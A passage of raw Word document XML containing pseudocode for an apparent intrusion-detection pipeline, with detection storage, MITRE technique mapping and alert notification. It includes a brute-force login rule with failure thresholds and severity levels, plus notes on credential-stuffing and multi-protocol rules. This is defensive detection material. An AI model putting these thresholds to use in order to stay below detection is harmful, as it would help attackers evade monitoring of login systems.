              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">5:          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">catch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> e: log error  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">// others go on</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">6:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">end for</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">7:      new ← store(dets)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">8:      correlate.run()       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">// A7</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">9:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> new ≠ ∅ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> notifier.notify(new)  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">// A8</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">10: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> store(dets):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">11:     bucket ← date + minute-of-day ÷ 60</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">12:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">for each</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> d </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> dets </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">do</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">13:         key ← ip|type|proto|device|bucket</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">14:         ids, names ← mitre.techniques_for(type)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">15:         INSERT … ON CONFLICT (dedupe_key)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">16:           DO UPDATE severity ← max(old, new)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">17:         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> row was inserted </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> add d </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> new</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">18:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> new</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">1:  rows ← SELECT ip, protocol,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">2:        count(fails), count(ok),</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">3:        distinct users, distinct pwds</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">4:     FROM events WHERE type = auth</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">5:       AND ts &gt; NOW() − 10 min</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">6:     GROUP BY ip, protocol</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">7:     HAVING fails ≥ BF_THRESHOLD (5)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">8:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">for each</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> row </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">do</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">9:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> fails ≥ 50 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> sev ← CRITICAL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">10:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">else if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> fails ≥ 20 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> sev ← HIGH</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">11:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">else</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> sev ← MEDIUM</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">12:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">emit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">(ip, BRUTE_FORCE, sev, details)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">13: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">end for</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">14: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">// other rules follow the same pattern:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">15: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">//   stuffing: ≥3 users per password/30 min</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">16: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">//   multi-protocol: ≥2 protocols/60 min</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
